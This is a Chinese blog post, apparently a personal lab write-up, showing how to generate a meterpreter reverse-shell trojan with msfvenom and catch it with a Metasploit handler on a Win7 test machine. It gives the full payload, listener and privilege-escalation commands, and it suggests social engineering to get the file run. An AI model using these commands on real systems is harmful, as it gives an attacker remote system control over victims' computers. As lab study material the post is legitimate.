记一次反弹木马实操

2020-04-10  本文已影响0人  佛系小沈

原理

利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。

准备:

win7靶机 ip :192.168.56.130
kali攻击机 ip: 192.168.56.135

实战:

1.首先,关掉win7的防火墙(不知道不关有没有影响,但是为了更强的征服感,还是先关了)
2.打开kali机,在命令行输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -f exe >/home/kali/Desktop/1.exe

LHOST是主机的ip,用来“提醒”木马成功后应该返回信息给自己的主机。
lport是返回时连接的端口号,需要开启tcp功能,1234端口好像默认开启?
> 后面的那一串表示木马生成的对应地址,为了方便操作我直接生成在桌面上。

木马生成了以后,需要设置一下控制台

输入

msfconsole

进入metasploit。
然后输入

use exploit/multi/handler

开启监听模式
接下来就是设置参数了,可以使用option命令来查看需要设置的参数。主要设置三个:payload、LHOST、LPORT,需要跟木马一样,复制一下就行

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.135
set lport 1234

这里大小写随意,都可以被识别。
随后输入

exploit

执行监听命令,也就是攻击开始~

kali端操作结束!

然后,可以利用社会工程学,诱骗“受害者”上当受骗。

现在假装win7被骗了,无意中点了我的反弹木马:


image.png

然后输入

shell

就可以获取对方管理员权限。
在输入shell之前,输入getsystem,获得system权限以后,再输入shell就可以获得最高权限啦~

image.png
使用echo %username%可以输出使用者的名字,这里是SJX-PC$,如果是管理员的话,只会显示管理员账号(我这里是“sjx”),而且,看前面的内容也可以知道是system权限: image.png

本篇文章仅供学习使用,读者请勿随意对他人电脑进行操作。

上一篇 下一篇

猜你喜欢

热点阅读